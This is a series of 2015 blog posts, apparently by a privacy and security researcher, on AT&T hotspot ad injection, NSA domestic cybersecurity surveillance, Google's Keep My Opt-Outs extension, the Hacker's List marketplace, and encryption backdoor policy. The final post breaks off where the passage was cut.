Web Policy

AT&T Hotspots: Now with Advertising Injection

jonathan — Tue, 25 Aug 2015 18:21:06 +0000

While traveling through Dulles Airport last week, I noticed an Internet oddity. The nearby AT&T hotspot was fairly fast—that was a pleasant surprise.

But the web had sprouted ads. Lots of them, in places they didn’t belong.

Last I checked, Stanford doesn’t hawk fashion accessories or telecom service.¹ And it definitely doesn’t run obnoxious ads that compel you to wait.

Some ad-supported websites, like the Wall Street Journal, were also emblazoned with extra marketing material.

Same goes for certain federal government websites.

Curious, and waiting on a delayed flight, I started poking through web source. It took little time to spot the culprit: AT&T’s wifi hotspot was tampering with HTTP traffic.

The ad injection platform appears to be a service from RaGaPa, a small startup. Their video pitch features “MONETIZE YOUR NETWORK” over cascading dollar signs. (Seriously.)

When an HTML page loads over HTTP, the hotspot makes three edits. (HTTPS traffic is immune, since it’s end-to-end secure.)

First, the hotspot adds an advertising stylesheet.

Next, it injects a backup advertisement, in case a browser doesn’t support JavaScript. It appears that the hotspot intercepts /ragapa URLs and resolves them to advertising images.²

Finally, the hotspot adds a pair of scripts for controlling advertisement loading and display.

Those scripts, in turn, import advertising content from additional third-party providers.

AT&T has an (understandable) incentive to seek consumer-side income from its free wifi service, but this model of advertising injection is particularly unsavory. Among other drawbacks: It exposes much of the user’s browsing activity to an undisclosed and untrusted business. It clutters the user’s web browsing experience. It tarnishes carefully crafted online brands and content, especially because the ads are not clearly marked as part of the hotspot service.³ And it introduces security and breakage risks, since website developers generally don’t plan for extra scripts and layout elements.

Recent experience with advertisement injection is telling. When a Marriott property was spotted deploying similar technology, it immediately reversed course. The handful of U.S. ISPs that have dabbled in advertising injection appear to have backed off. Earlier this year, Google conducted a comprehensive study of advertising injection, and yanked nearly 200 misleading extensions from the Chrome Web Store. The closest common practice, to my knowledge, is injecting hotspot status indicators—and that’s also proven extraordinarily controversial.

The legality of hotspot advertising injection is a messy subject. There are a number of colorable arguments against, including under the FCC’s net neutrality rules,⁴ the FTC’s unfairness and deception authorities (and state parallels),⁵ wiretapping statutes,⁶ pen register statutes, tortious interference, copyright, and more. It certainly doesn’t help AT&T and RaGaPa that the ads aren’t labeled as associated with the hotspot, and that AT&T’s wifi terms of service are silent about advertising injection.⁷

Regardless of where the law is, AT&T should immediately stop this practice. And if websites needed (yet another) reason to adopt HTTPS, here’s a good one.

I write shorter stuff at @jonathanmayer.

1. Since I imagine some readers will be pedantic—yes, the Stanford bookstore does sell a small selection of jewelry, and yes, Stanford does provide on-campus Internet service.

2. I didn’t have time to test this feature before I boarded my flight. It seems a particularly poor technical design, since it relies on avoiding URL path collisions and it misrepresents the source of content.

3. While the most frequent advertisements appeared to be related to AT&T services, they were ordinary banner ads for residential offerings, not marked in any way as associated with the hotspot. And, at any rate, many ads had nothing to do with AT&T.

4. In precise regulatory terminology, AT&T’s hotspot network is (arguably) a “broadband Internet access service,” and is (also arguably) “unreasonably interfering with” or “unreasonably disadvantaging” consumer or website connectivity.

5. The FTC’s ability to enforce against AT&T depends on the FCC’s net neutrality rules. If the free component of AT&T’s hotspot network is a covered “broadband Internet access service,” then the FTC Act’s common carrier exception prevents enforcement. The FTC could still bring an action against RaGaPa.

6. According to RaGaPa’s product sheet, one possible configuration involves redirecting all user traffic through RaGaPa’s servers. That would raise particularly thorny wiretapping issues. I didn’t spot the provision until after departing Dulles, unfortunately, so I didn’t test whether AT&T was re-routing customer traffic.

7. The closest passage in AT&T’s wifi terms of service is:

We may also enable certain technologies intended to improve your experience, maintain network security, and/or optimize network utilization that may generate records regarding the websites you visit and search terms you enter while using the Service.

AT&T might argue that ad injection “improve[s] your experience.” Good luck with that.

The NSA’s Domestic Cybersecurity Surveillance

jonathan — Thu, 04 Jun 2015 15:10:23 +0000

Earlier today, the New York Times reported that the National Security Agency has secretly expanded its role in domestic cybersecurity. In short, the NSA believes it has authority to operate a warrantless, signature-based intrusion detection system—on the Internet backbone.¹

Owing to the program’s technical and legal intricacies, the Times-ProPublica team sought my explanation of related primary documents.² I have high confidence in the report’s factual accuracy.³

Since this morning’s coverage is calibrated for a general audience, I’d like to provide some additional detail. I’d also like to explain why, in my view, the news is a game-changer for information sharing legislation.

The Facts

Despite nearly two years of disclosures, the NSA’s domestic Internet surveillance remains shrouded in secrecy. To borrow Donald Rumsfeld’s infamous turn of phrase, it remains one of the greatest known unknowns surrounding the agency.

The following facts are already public.

The NSA maintains “upstream” interception equipment at many points on the global telecommunications backbone.
One of the primary legal authorities for domestic upstream surveillance is Section 702 of the FISA Amendments Act (FAA).
The Foreign Intelligence Surveillance Court (FISC) has authorized warrantless FAA surveillance in connection with foreign governments, counterterrorism, and counterproliferation. Each of these topics has an associated “certification,” establishing procedures for targeting and minimization.
The NSA can use FAA upstream Internet surveillance to collect⁴ traffic that is “to,” “from,” or “about”⁵ a “selector.” Prior disclosures have emphasized email addresses as FAA upstream Internet selectors.
In order for a selector to be eligible for FAA surveillance, it must be used by a foreign person or entity outside the United States.
Intelligence community^a ~~NSA~~ analysts can search FAA surveillance data for information involving Americans. Senator Wyden has been a particularly persistent critic of these queries, dubbing them “backdoor searches.”

The primary documents associated with today’s report confirm the following additional facts.⁶

The NSA can use FAA upstream Internet surveillance for cybersecurity purposes, so long as there is a nexus with one of the three prior certifications. The most common scenario is where the NSA can attribute a cybersecurity threat to another nation, enabling it to rely on the foreign government certification.
Internet protocol (IP) addresses and ranges are eligible as FAA upstream surveillance selectors. The Department of Justice approved this practice in July 2012.⁷
Cybersecurity threat signatures are also eligible as FAA upstream surveillance selectors. This adds a de facto fourth category of FAA interceptions, since a threat signature cannot reasonably be categorized as “to,” “from,” or “about” a particular address.⁸ DOJ appears to have approved the practice in May 2012.
The NSA has acted upon the above legal interpretations. The primary documents make reference to particular FAA cybersecurity operations. Those operations relied on the foreign government certification, and they used IP addresses as selectors.
Since 2012, if not earlier, the NSA has prioritized obtaining an FAA “cyber threat” certification. From the agency’s perspective, a cyber certification has two desirable properties. First, it would eliminate the nexus requirement. The NSA would be able to intercept traffic associated with a cybersecurity threat, regardless of whether the threat originates with a foreign government. Second, a cyber certification would codify procedures for IP address and signature targeting. The present status of the cyber certification is not apparent; it may have been approved, have been bundled into another certification, still be in progress, or have been set aside.⁹ It is also not apparent how FAA’s foreignness requirement would be implemented under the certification.¹⁰
When data is exfiltrated in the course of an attack, it often includes sensitive information about Americans. The NSA believes that this exfiltrated data should be considered “incidental” collection, rendering it eligible for backdoor searches. Put differently: when a data breach occurs on American soil, and the NSA intercepts stolen data about Americans, it believes it can use that data for intelligence purposes.
The NSA collaborates with the Department of Homeland Security and the Federal Bureau of Investigation on cybersecurity matters. It receives and shares cybersecurity threat signatures with both agencies. When the NSA wishes to disclose a threat signature to the private sector, it usually routes that information through DHS or the FBI. The NSA is not attributed as the source of the threat signature.
The FBI does not have its own national security surveillance equipment installed on the domestic Internet backbone. It can borrow the NSA’s equipment, though, by having the NSA execute surveillance on its behalf.

In my view, the key takeaway is this: for over a decade, there has been a public policy debate about what role the NSA should play in domestic cybersecurity. The debate has largely presupposed that the NSA’s domestic authority is narrowly circumscribed, and that DHS and DOJ play a far greater role. Today, we learn that assumption is incorrect. The NSA already asserts broad domestic cybersecurity powers. Recognizing the scope of the NSA’s authority is particularly critical for pending legislation.

Information Sharing

In recent years, domestic cybersecurity legislation has focused on information sharing. The notion is that private businesses are not swapping vital threat information, owing to potential legal liability. (Like the overwhelming majority of computer security professionals, I believe that premise is inaccurate.)

There are at least five different information sharing bills presently before Congress. CISPA passed the House in 2012; it was widely condemned by an online grassroots effort, and it ultimately drew a veto threat from the White House. This year, both PCNA and NCPAA have cleared the House, and the Senate is likely to take up information sharing soon.

The conventional privacy criticism of information sharing legislation goes, roughly, like this. Private online activity is protected by a longstanding legal framework, including the Wiretap Act and the Stored Communications Act. Information sharing legislation would drill gaping, ill-defined holes in those safeguards. Businesses would increasingly share highly sensitive information with the government, which could in turn use and share that information for law enforcement and other purposes.¹¹ In Senator Wyden’s memorable phrasing, information sharing legislation is “a surveillance bill by any other name.”

The consistent response to this line of criticism has been to emphasize that information sharing legislation is not a grant of surveillance authority. When PCNA was under consideration, for instance, Representative Schiff insisted: “[L]est anyone be confused, this bill makes clear in black and white legislative text that nothing authorizes government surveillance in this act. Nothing.”

That perspective is only half true. PCNA does explicitly decline to grant new cybersecurity surveillance powers, and NCPAA has a roughly parallel provision.

But the NSA already has sweeping cybersecurity surveillance authority. It doesn’t need a new statutory grant of power. By feeding threat signatures to the NSA, information sharing would activate the agency’s existing authority.

This understanding of the NSA’s domestic cybersecurity authority leads to, in my view, a more persuasive set of privacy objections. Information sharing legislation would create a concerning surveillance dividend for the agency.

Because this flow of information is indirect, it prevents businesses from acting as privacy gatekeepers. Even if firms carefully screen personal information out of their threat reports, the NSA can nevertheless intercept that information on the Internet backbone.

Furthermore, this flow of information greatly magnifies the scale of privacy impact associated with information sharing. Here’s an entirely realistic scenario: imagine that a business detects a handful of bots on its network. The business reports a signature to DHS, who hands it off to the NSA. The NSA, in turn, scans backbone traffic using that signature; it collects exfiltrated data from tens of thousands of bots. The agency can then use and share that data.¹² What began as a tiny report is magnified to Internet scale.

Sometimes I write shorter stuff at @jonathanmayer.

This was a personal project; it did not make use of Stanford University resources.

1. While I’m not a fan of the “cyber” prefix, I believe it is important to this particular piece. Apologies.

Also, I focus here on “upstream” surveillance of Internet traffic. Many of the same observations apply to stored data, under the PRISM program.

2. Accepting was, candidly, a very difficult decision. I have mixed views on large-scale government leaks, and I appreciate the legitimacy and importance of keeping intelligence operations classified. I participated in this project because it centers on secret interpretations of United States law, and because it is highly relevant to ongoing legislative and policy debates.

I recognize that friends and colleagues in the intelligence community may disagree with my decision to participate in this project. I greatly value those relationships, and I sincerely hope that my participation will not impair them. I would also emphasize that both the Times report and this blog post deliberately omit specific surveillance targets, resulting intelligence, and agency personnel.

3. Early coverage of NSA programs was, unfortunately, riddled with legal and technical misunderstandings. Computer security and privacy journalism is markedly better when it incorporates advance review by lawyers and computer scientists with relevant expertise.

4. The scope of what information the NSA temporarily buffers remains deeply ambiguous. Some observers believe that the agency temporarily retains (but does not “collect,” within the legal meaning) all one-end foreign Internet traffic.

5. The technical implementation of “about” collection appears to involve matching strings in traffic flows, plus filtering for at least one IP address outside the United States.

6. Since the Snowden archive ends in mid-2013, some of these facts may be outdated.

7. It is not apparent whether this was the first instance of IP address selectors, or IP address selectors specifically for cybersecurity. It is also not apparent whether the NSA sought the FISC’s advance permission for using IP address or signature selectors.

Prior reports had suggested IP-based targeting was allowed, and it was widely assumed to be permissible among surveillance scholars. It certainly comes as little surprise.

8. In precise surveillance law lingo, signature selectors are not “to,” “from,” or “about” a specific “communications facility.”

9. After reviewing recent public statements by a number of intelligence officials, I do not believe there is particularly strong evidence for or against the existence of a cyber certificate.

10. Even modestly sophisticated intrusions are, at least at first, difficult to attribute. In the absence of further information, the NSA would presumably assume foreignness. And even if the agency implemented a technical foreignness requirement (e.g. a one-end foreign IP filter), many run-of-the-mill attacks are either based outside the United States or bounce through a proxy outside the United States.

11. Subject to the usual Section 702 minimization procedures.

12. Again, subject to minimization procedures.

a. Thanks to Charlie Savage for suggesting a clarification. The statement was literally true—NSA analysts can conduct backdoor searches under FAA. Since this piece is focused on upstream surveillance, and since the rules for backdoor searches are nuanced and ambiguous, here’s some further detail.

Present NSA policy appears to voluntarily limit U.S. person backdoor queries to stored communications (PRISM). FBI and CIA analysts can also conduct U.S. person backdoor queries on PRISM data, and may be able to request backdoor queries on FAA upstream data; public disclosures are ambiguous on the issue.

(Aside 1: while these are the rules for U.S. person backdoor queries, they are not always followed. According to the NSA’s reports to the President’s Intelligence Oversight Board, for instance, noncompliant queries do occur.)

(Aside 2: this post is focused on the FISA Amendments Act. There are other legal structures for cybersecurity surveillance, including FISA Title I and Executive Order 12333. The backdoor query rules for those upstream and cloud service collections may differ.)

This much is certain about FAA cybersecurity surveillance: If the NSA snoops on hackers as they move stolen data over the Internet backbone, agency analysts can sift through that information—other than with explicit U.S. person queries. If the NSA, FBI, or CIA snoops on hackers as they move stolen data through a cloud service, such as Dropbox or Gmail, analysts can sift through that information—including with explicit U.S. person queries.

The Efficacy of Google’s Privacy Extension

jonathan — Mon, 01 Jun 2015 17:48:42 +0000

Over four years ago, Google launched a Chrome privacy extension. Keep My Opt-Outs arrived with a media splash, and it presently has over 400,000 users worldwide.¹

It’s a top result on the Chrome Web Store,² and it’s even endorsed by a faux celebrity.

Unfortunately, the Keep My Opt-Outs extension isn’t nearly as effective as Google claims. It hasn’t been updated for years, resulting in only half of the promised coverage. Keep My Opt-Outs also doesn’t work in Chrome’s private browsing mode, despite the user’s explicit permission.

If you’re currently running Keep My Opt-Outs, I’d encourage switching to Disconnect or Privacy Badger.³ Adblock, Adblock Plus, and Ghostery are also excellent privacy tools, when configured properly.

In this post, I’ll explain why Google emphasized the Keep My Opt-Outs extension, how the code works, and what went awry.

History

Google was in a bind.⁴ It was late 2010, and consumer web tracking had come under extraordinary pressure. The Federal Trade Commission issued a report calling for easy consumer choice, and legislators were readying responsive bills. The Wall Street Journal was in the midst of a blistering investigative series. Microsoft had introduced new blocking features for Internet Explorer. An eclectic group of academics, advocates, and Mozilla engineers were coalescing around “DNT: 1,” a Do Not Track HTTP header.

Google had to do something. A contingent of Chrome engineers favored the Do Not Track approach; it was easy to implement, easy to use, and on a path to standardization.⁵ Google’s advertising team was opposed to Do Not Track, and wanted to stick with the industry’s existing opt-out cookies. Externally, it expressed concern that Do Not Track was not sufficiently defined. Internally, it worried that Do Not Track might become too protective or too popular. (Opt-out cookies only prevent advertising personalization, not tracking, and are rarely used.) The policy group, for its part, was deeply divided. Making matters even more complicated, none of these three factions had decision-making authority.

And so Google arrived at a stopgap compromise. It would feature a Chrome extension that simply persisted and updated opt-out cookies. For the Chrome team, it was easy to build, involved no changes to the browser, and provided users with a real (albeit small) privacy gain. For the advertising team, it was essentially equivalent to opt-out cookies. And for the policy team, it was a useful prop when interacting with Washington and media critics.

That alignment of interests resulted in a prominent rollout.⁶ Google featured the extension in written submissions to the Federal Trade Commission and the Commerce Department.

Design

The architecture of Keep My Opt-Outs is straightforward, and essentially equivalent to prior opt-out extensions. If I were teaching an undergraduate computer science course, it would make for a nice project. (Google still filed for a patent.)

The extension includes a list of advertising firms and associated opt-out cookies. When initialized, Keep My Opt-Outs sets those cookies. It then monitors the browser’s cookie store for changes. If any of the cookies gets modified or deleted, Keep My Opt-Outs simply reverts the change. That’s all.

Shortcomings

Keep My Opt-Outs is only as effective as its internal cookie list. If a business isn’t included, it isn’t covered by the extension. Given how quickly the online advertising ecosystem has grown, regular updates are a must.

The extension doesn’t include a special mechanism for updating its cookie list. In order to revise which businesses are included, Google has to release a new version.

Over the past several years, Google appears to have… forgot. The latest revision of the cookie list was in October 2011.⁷

That’s a huge blow to the extension’s efficacy. It only limits personalized advertising for about half of the businesses that offer a self-regulatory opt-out setting. Several large industry players, including Facebook, aren’t covered.

What’s more, if a user enables Chrome’s private browsing mode—to protect their privacy further—they lose the extension’s opt-out protection.⁸

That’s even though a user has explicitly authorized Keep My Opt-Outs in private browsing mode.

Even Google’s own opt-out preference stops working properly.

The reason is that Keep My Opt-Outs doesn’t account for the separate private browsing cookie store. It doesn’t initialize all the opt-out cookies in its list, and it doesn’t properly handle missing opt-out cookies.⁹

Parting Thoughts

There’s an undeniable irony here. In the interest of avoiding Federal Trade Commission action, Google appears to have violated the FTC Act. According to Google, Keep My Opt-Outs covers “all companies that offer opt-outs through the industry self-regulation programs.” And, “as more companies adopt the industry privacy standards . . . their opt-outs will be automatically added to Keep My Opt-Outs.” Those statements are untrue, exposing Google to consumer deception liability.

As for privacy technology, the lesson of Keep My Opt-Outs is that future-proofing is essential.¹⁰ The web changes quickly. Any consumer control technology—and promises surrounding that technology—must be built to last.

I write shorter stuff at @jonathanmayer.

1. This post is focused on the Chrome extension, since it is far and away the most prominent version of Keep My Opt-Outs. There are also Firefox and Internet Explorer variants; according to Google’s download statistics, they have very few users.

2. In informal tests, the extension appeared as a top-three result for “advertising” and “opt out.”

3. Disclosure: I’ve helped out with the Privacy Badger project. I don’t recommend the advertising industry’s Protect My Choices extension since it doesn’t stop tracking, just personalized advertising. Also, Protect My Choices is derived from Keep My Opt-Outs, and has the same updating issue. The extension’s list of opt-out cookies appears to have last been revised in July 2014.

4. The above narrative is drawn from conversations with a number of Google employees, during the height of Do Not Track negotiations. It’s an attempt to capture the zeitgeist and the aggregate views of particular teams. Individual employees, of course, held diverse perspectives. I’d like to particularly emphasize that I have no insight into what the author of Keep My Opt-Outs was thinking. Past comments reflect that he believed in the privacy value of the extension, and I have no reason to doubt his sincerity.

5. In one memorable (and odd) conversation, a couple of Chrome developers bragged about how few lines of code were required.

6. It’s entirely possible that the extension would have existed regardless of external pressures and internal politics. This much is certain: the extent of fanfare surrounding Keep My Opt-Outs was a direct result of those phenomena.

7. The following figure is drawn from Internet Archive data. Not all Digital Advertising Alliance member companies offer an opt-out setting, resulting in the discrepancy between these counts and counts on opt-out webpages.

8. Private browsing mode does not frustrate tracking within a private browsing session. It also doesn’t impact tracking with stateless (“fingerprinting”) technologies.

9. Specifically, Keep My Opt-Outs iterates only the main cookie store, when the extension loads. While the extension does include some logic for handling altered or deleted opt-out cookies, that logic is only triggered by a modification to a valid opt-out cookie.

10. The GitHub page for Keep My Opt-Outs suggests that Google is planning to retire the extension. While that may be a sensible product direction, Google’s representations oblige it to maintain the extension until its retirement.

Exploring a Hacker Marketplace

jonathan — Thu, 21 May 2015 17:02:18 +0000

In the sharing economy, you can hire a one-off driver (Uber), courier (Postmates), grocery shopper (Instacart), housekeeper (Homejoy), or just about any other variety of henchman (TaskRabbit). So, what about hiring a hacker?

That’s the premise of Hacker’s List, a website launched in November. Anyone can post or bid on a hacking project. Hacker’s List arranges secure communication and payment escrow.

An online black market is, to be sure, nothing new. The rise and fall of the Silk Road received extensive media coverage.

What’s unusual about Hacker’s List is that it, purportedly, isn’t a black market. The website is public, projects and bids are open (albeit pseudonymous), and the owner has identified himself. (He runs a small security firm in Denver.) Hacker’s List was even featured on the front page of the New York Times.

Out of curiosity, I decided to leverage this openness. Who tries to hire a hacker? Is the website as popular as its owner claims? Most importantly, does the website facilitate illegal transactions, or solely white hat hacking?

To answer these questions—and, admittedly, to procrastinate on my dissertation—I cobbled together a crawler. You can find the source on GitHub, and the crawl data on Google Docs.

Here’s the short version: most requests are unsophisticated and unlawful, very few deals are actually struck, and most completed projects appear to be criminal.

Who Tries to Hire a Hacker?

A majority of requests¹ involve compromising cloud service accounts. The most common targets are Facebook (expressly referenced in 23% of projects) and Google (14%). Motives vary, and often involve a business dispute or jilted romance. (How cliché.)

The second most common scenario (8%) arises from academia. There is, apparently, enormous demand for artificially improving grades — especially at the undergraduate level. Targets include the University of California, UConn, and the City College of New York.

A final fact pattern that bears mention is altering search results. About 3% of projects involve burying some embarrassing tidbit, essentially an ersatz Right to be Forgotten.

These observations come with an important caveat: the requests on Hacker’s List are overwhelmingly cheap and unsophisticated. The median project is priced from $200 to $300, and many descriptions reflect technical misunderstanding. Hacker’s List certainly isn’t representative of the market for high-end, bespoke attacks. But the site does seem a fair cross-section of the hacks that ordinary Internet users might seek out.

As an aside, many users on Hacker’s List are trivially identifiable. Some submissions explicitly include a name, contact information, or a street address. Also, owing to the design of the site’s social integration, I was able to match 25% of active accounts to a Facebook profile. So much for “discreetly” hiring a hacker.

How Popular Is Hacker’s List?

The owner of Hacker’s List has claimed that the site “exploded” and “went viral.” Visitor traffic certainly shot up following January press coverage.

Actual usage of the site, though, has been lackluster. There are only about two to three projects posted per hour, and month to month growth is slim. By any usual startup benchmark, Hacker’s List is hardly a sensation.²

What’s more, the overwhelming majority of hacking requests go nowhere. Fewer than 0.1% of projects advance to an actual hack.³

The owner of Hacker’s List told the New York Times last week that over 250 jobs have been completed. That claim is not consistent with the site’s own data, which includes just 21 finished tasks.

Money does appear to change hands on Hacker’s List, to be clear. It’s just… not for hacking. Rather, you have to pay the site $3 to bid on a project. And each time you fund your account, there’s a minimum of $10.

Are Completed Projects Legal?

Hacker’s List “is intended for legal and ethical use.” And, according to the owner, “[n]o one is going to complete an illegal project through my website.”

How about “i need hack account facebook of my girlfriend,” completed for $90 in January? Or “need access to a g mail account,” finished for $350 in February? Or “I need [a database hacked] because I need it for doxing,” done for $350 last month?

This much is certain: the overwhelming majority of posts solicit criminal activity, and most of the (few) completed projects appear to be crimes.

Is a Hacker Marketplace Legal?

I’d like to close by taking a step back. Is the very concept of a hacker marketplace compatible with American law?

Websites are, for the most part, not liable for user misdeeds. For nearly two decades, federal law has expressly immunized online services.

A hacker marketplace doesn’t benefit from this immunity, though. There’s an explicit exception for federal criminal offenses. That includes violations of the Computer Fraud and Abuse Act, the federal hacking law.

So, is the operator of a hacker marketplace a criminal? Liability as an accomplice or conspirator is certainly possible. The operator of the Silk Road, for instance, was convicted on a hacking conspiracy charge (among others).

Whether a website owner would be culpable is an exceedingly fact-specific issue. The precise legal question is: did the owner actually intend that crimes be committed, or did they merely know that crimes would be committed?⁴

That’s a very subtle distinction to base a business on. Especially when the potential downside involves years in federal prison.

At best, then, a hacker marketplace exists in a legal limbo.

I write shorter stuff at @jonathanmayer.

1. The results that I report are based on projects and bids that my crawler could access. There appear to be a number of Hacker’s List project IDs that are not associated with a live project page. What happened to those projects, I cannot say. I was able to recover some details via the Hacker’s List revision tracker; as with the live projects, almost all are unlawful.

2. The following figure is based on the last revision date associated with each project. It includes all projects in the revision tracker, many of which do not have a live project page.

3. The data in the following figure is drawn from the Hacker’s List bidding interface, which allows querying for bids by stage of the bidding process. The figure is adapted from the Hacker’s List control panel.

4. If you’d like to learn more about that (hazy) distinction, I recommend the classic case of People v. Lauria.

“We Support Strong Encryption”

jonathan — Tue, 12 May 2015 17:53:19 +0000

A good Washington talking point delivers zero content. A great Washington talking point sounds substantive… while delivering zero content.

In the spirit of honoring greatness, I’d like to call attention to the current White House position on cryptographic backdoors. It received its most public airing from President Obama, in a February 13 interview with RE/CODE.

“I’m a strong believer in strong encryption,” explained the President. “[T]here’s no scenario in which we don’t want really strong encryption.”

President Obama isn’t the only official invoking “strong encryption.” (And strongly, too.) In just about every recent conversation with an administration policymaker, I’ve been subjected to some version of the line.

Here’s the official, pre-canned White House position:

The United States Government firmly supports the development and adoption of strong encryption, which is a key tool to secure commerce and trade, safeguard private information, promote free expression and association, and strengthen cybersecurity.

To a computer security expert, or to a privacy advocate, “strong encryption” might sound like a policy victory. It means encryption that minimizes security risks. It means encryption where the user controls access. It means encryption that doesn’t include a vendor or government backdoor. And so, among colleagues, I’ve heard recent praise of the White House position.

To a law enforcement or intelligence official, though, “strong encryption” means something very different. It means encryption that minimizes security risks, but subject to the constraint that the government can still access data. It means encryption where the user controls access, except where the government is involved. It means encryption that does include a government backdoor, but a well-designed backdoor.¹

That’s why, in a recent House hearing, the FBI’s representative testified that “[c]ompanies must continue to provide strong encryption for their customers.” And that’s why, twenty years ago, at the height of the Crypto Wars, the FBI’s director testified “in favor of strong encryption, robust encryption.”

The White House has, to be fair, distanced itself from law enforcement and intelligence agencies on this issue. When the President said, “I lean probably further on side of strong encryption than some in law enforcement,” his cybersecurity team was sending a deliberate signal. They’re still thinking, and they’re still undecided.

The takeaway is straightforward. Next time you hear an official speak about “strong encryption,” recognize that you’ve heard zero content. And maybe take a moment to bask in the Washington greatness.

1. Several computer security colleagues have suggested that government access and “strong encryption” are fundamentally incompatible, that well-designed backdoors are technically impossible, and that the White House faces an either-or decision. The strongest articulation I’ve heard is that “backdoors break the Internet.” While I imagine that posing a binary choice is a useful rhetorical tool, I believe the issue is more nuanced. There are better and worse designs for government access to a communications or storage system, and in a handful of scenarios, the marginal security risk might be cabined. Backdoors are still a really bad idea, for a long list of reasons, but they don’t necessarily “break the Internet.”

You Can’t Backdoor a Platform

jonathan — Tue, 28 Apr 2015 14:00:53 +0000

According to law enforcement and intelligence agencies, encryption should come with a backdoor. It’s not a new policy position—it dates to the Crypto Wars of the 1990s—but it’s gaining new Beltway currency.

Cryptographic backdoors are a bad idea. They introduce unquantifiable security risks, like the recent FREAK vulnerability. They could equip oppressive governments, not just the United States. They chill free speech. They impose costs on innovators and reduce foreign demand for American products. The list of objections runs long.

I’d like to articulate an additional, pragmatic argument against backdoors. It’s a little subtle, and it cuts across technology, policy, and law. Once you see it, though, you can’t unsee it.

Cryptographic backdoors will not work. As a matter of technology, they are deeply incompatible with modern software platforms. And as a matter of policy and law, addressing those incompatibilities would require intolerable regulation of the technology sector. Any attempt to mandate backdoors will merely escalate an arms race, where usable and secure software stays a step ahead of the government.

The easiest way to understand the argument is to walk through a hypothetical. I’m going to use Android; much of the same analysis would apply to iOS or any other mobile platform.

An Android Hypothetical

Imagine that Google rolls over and backdoors Android. For purposes of this post, the specifics of the backdoor architecture don’t matter. (My recent conversations with federal policymakers have emphasized key escrow designs, and the Washington Post’s reporting is consistent.) Google follows the law, and it compromises Android’s disk encryption.

But there’s an immediate problem: what about third-party apps? Android is, by design, a platform. Google has deliberately made it trivial to create, distribute, and use new software. What prevents a developer from building their own secure data store on top of Android’s backdoored storage? What prevents a developer from building their own end-to-end secure messaging app?

The obvious answer is that Google can’t stop with just backdooring disk encryption. It has to backdoor the entire Android cryptography library. Whenever a third-party app generates an encrypted blob of data, for any purpose, that blob has to include a backdoor.

Now there’s another problem: what about third-party apps that don’t rely on the Android cryptography library? It’s already common practice to use alternatives. Maybe the government could require some commercial libraries, like Facebook Conceal, to incorporate backdoors. Federal authorities certainly won’t be able to reach free, open source, international¹ libraries, like OpenSSL, NaCl, or Bouncy Castle. The jurisdictional obstacles to regulation are insurmountable. What’s more, there would be serious First Amendment issues, since a cryptography library is largely math (i.e. speech).

So, how can the government make sure that Android apps use only backdoored libraries? Direct regulation of app developers wouldn’t be enough, since many developers are outside the reach of the American legal system. And, if Google wanted, it could allow developers to submit apps anonymously.²

The solution would have to be intermediary liability, where Google is compelled to play gatekeeper.

One option: require Google to police its app store for strong cryptography. Another option: mandate a notice-and-takedown system, where the government is responsible for spotting secure apps, and Google has a grace period to remove them. Either alternative would, of course, be entirely unacceptable to the technology sector—the DMCA’s notice-and-takedown system is widely reviled, and present federal law (CDA 230) disfavors intermediary liability.

This hypothetical is already beyond the realm of political feasibility, but keep going. Assume the federal government sticks Google with intermediary liability. How will Google (or the government) distinguish between apps that have strong cryptography and apps that have backdoored cryptography?

There isn’t a good solution. Auditing app installation bundles, or even requiring developers to hand over source code, would not be sufficient. Apps can trivially download and incorporate new code. Auditing running apps would add even more complexity. And, at any rate, both static and dynamic analysis are unsolved challenges—just look at how much trouble Google has had identifying malware and knockoff apps.

Continue with the hypothetical, though. Imagine that Google could successfully banish secure encryption apps from the official Google Play store. What about apps that are loaded from another app store? The government could feasibly regulate some competitors, like the Amazon Appstore. How, though, would it reach international, free, open source app repositories like F-Droid or Fossdroid? What about apps that a user directly downloads and installs (“sideloads”) from a developer’s website?

The only solution is an app kill switch.³ (Google’s euphemism is “Remote Application Removal.”) Whenever the government discovers a strong encryption app, it would compel Google to nuke the app from Android phones worldwide. That level of government intrusion—reaching into personal devices to remove security software—certainly would not be well received. It raises serious Fourth Amendment issues, since it could be construed as a search of the device or a seizure of device functionality and app data.⁴ What’s more, the collateral damage would be extensive; innocent users of the app would lose their data.

Designing an effective app kill switch also isn’t so easy. The concept is feasible for app store downloads, since those apps are tagged with a consistent identifier. But a naïve kill switch design is trivial to circumvent with a sideloaded app. The developer could easily generate a random application identifier for each download.⁵

Google would have to build a much more sophisticated kill switch, scanning apps for prohibited traits. Think antivirus, but for detecting and removing apps that the user wants. That’s yet another unsolved technical challenge, yet another objectionable intrusion into personal devices, and yet another practice with constitutional vulnerability.

Stick with the hypothetical, and assume the app kill switch works.⁶ Secure native apps are gone.

What about browser-based apps? It’s possible to build a secure data store or messaging app that loads entirely over the web, from the user interface to the cryptography library, and gets saved on the user’s device. The requisite web standards are already in place. This is not a good engineering design, to be clear—it should only be a last resort—but it is possible. And it circumvents the Android cryptography library, Google Play restrictions, and the app kill switch.

That leaves just one option.⁷ In order to prevent secure data storage and end-to-end secure messaging, the government would have to block these web apps. The United States would have to engage in Internet censorship.

Are Criminals Really That Smart?

It’s easy to spot the leading counterargument to this entire line of reasoning. I’ve heard it firsthand from both law enforcement and intelligence officials.

“Sure,” the response goes, “it’s impossible to entirely block secure apps. Sophisticated criminals will always have good operational security. But we don’t need complete backdoor coverage. If we can significantly increase the barriers to secure storage and messaging, that’s still a big win. Most criminals really aren’t so smart.”

That response isn’t convincing. We’re already talking about the smart criminals here.⁸ Android and iOS continue to allow for government access to data by default.

In order to believe that backdoors will work,⁹ we have to believe there is a set of criminals who are smart enough to do all of the following:

Disable default device backups to the cloud. Otherwise, the government can obtain device content directly from the cloud provider.
Disable default device key backups to the cloud, if the government retrieves the device. Otherwise, the government can obtain the key from the cloud, and decrypt the device.
Disable default device biometric decryption, if the government retrieves the device and detains its owner. Otherwise, the government can compel the owner to decrypt the device.
Avoid sending incriminating evidence by text message, email, or any other communications system that isn’t end-to-end secure. Otherwise, the government can prospectively intercept messages, and can often obtain past communications.
Disable default cloud storage for each app that contains incriminating evidence, such as a photo library. Otherwise, the government can obtain the evidence directly from the cloud provider.

That’s quite a tall order. And yet, these same criminals must not be smart enough to do any of the following:

Install an alternative storage or messaging app.
Download an app from a website instead of an official app store.
Use a web-based app instead of a native mobile app.

It’s difficult to believe that many criminals would fit the profile.

Will These Apps Really Get Built?

There’s a slightly different counterargument that I’ve also heard. It’s less common, and it focuses on app developers rather than criminals.

